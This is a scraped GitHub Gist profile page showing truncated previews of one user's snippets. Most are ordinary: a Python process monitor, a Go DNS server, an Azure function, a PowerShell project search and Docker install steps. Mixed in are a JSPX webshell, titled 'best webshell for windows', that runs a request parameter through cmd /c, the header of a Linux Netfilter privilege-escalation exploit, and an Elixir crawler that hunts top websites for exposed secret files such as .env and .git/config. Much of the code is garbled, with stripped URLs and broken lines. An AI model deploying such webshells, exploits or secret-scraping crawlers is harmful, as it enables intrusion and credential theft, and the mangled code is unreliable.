Skip to content

Instantly share code, notes, and snippets.

View mpfund's full-sized avatar

Marinus Pfund mpfund

  • ifempty
  • Munich
View GitHub Profile
import psutil
import time
import os
def get_processes():
"""Get a dictionary of current processes with their command lines."""
processes = {}
for proc in psutil.process_iter(['pid', 'cmdline']):
processes[['pid']] =['cmdline']
* Test program for the ambient capabilities
* compile using:
* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
* Set effective, inherited and permitted capabilities to the compiled binary
* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
* To get a shell with additional caps that can be inherited do:
mpfund / wsh.jspx
Created June 27, 2024 06:30
best webshell for windows
<jsp:root xmlns:jsp="" version="1.2">
< contentType="text/html" pageEncoding="UTF-8" />
<jsp:scriptlet> <![CDATA[
String tmp = request.getParameter("i");
String[] cmd = {"cmd", "/c",tmp}; in = Runtime.getRuntime().exec(cmd).getInputStream(); br = new,"GBK"));
mpfund / main.go
Last active December 7, 2023 12:34
package main
import (
func main() {
// Create a DNS server instance
server := &dns.Server{Addr: ":53", Net: "udp"}
mpfund / secrets_crawler.exs
Last active April 3, 2023 08:57
crawler in elixir. finding secret files in alexa top 1m csv
Logger.configure(level: :info)
# Desktop.ini, /.git/config, /.DS_Store, /.subversion/config,
# Dockerfile, package.json, .env, appsettings.json, secrets.json
mpfund / exploit.c
Created July 9, 2022 19:38
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation
* CVE-2021-22555: Turning \x00\x00 into 10000$
* by Andy Nguyen (theflow@)
* theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
* theflow@theflow:~$ ./exploit
* [+] Linux Privilege Escalation by theflow@ - 2021
* [+] STAGE 0: Initialization
* [*] Setting up namespace sandbox...
mpfund / Main.js
Created April 21, 2022 21:45
Azure function with http call
const fetch = require("node-fetch"); // 1
module.exports = async function (context, req) { // 2
const accessToken = '...';
const url = '';
const headers = {
'Authorization': `token ${accessToken}`
mpfund / HomeController.cs
Created February 17, 2021 09:31
RegexRewriteWithCapture: a Microsoft.AspNetCore.Rewrite rule with regular expression and variable capture.
public class HomeController : Controller
private readonly ILogger<HomeController> _logger;
public HomeController(ILogger<HomeController> logger)
_logger = logger;
public IActionResult Index()
mpfund / find_projectfiles_without_appendtargetframework.ps1
Created February 8, 2021 18:35
find VisualStudio projectfile not containing AppendTargetFramworkToOutputPath
# New vs project cspoj file format appends .net framework version to output folder
# Search for all projectfiles containing net472 and not AppendTargetFrameworkToOuputPath
Get-ChildItem -Recurse *.csproj | where { ($_ | Select-String net472) -and -not ($_ | Select-String AppendTargetFrameworkToOutputPath) }
# source
sudo apt update
# let apt use package over https
sudo apt install apt-transport-https ca-certificates curl gnupg2 software-properties-common
# add docker gpg key
curl -fsSL | sudo apt-key add -
# add docker repository to apt
sudo add-apt-repository "deb [arch=amd64] $(lsb_release -cs) stable"
sudo apt update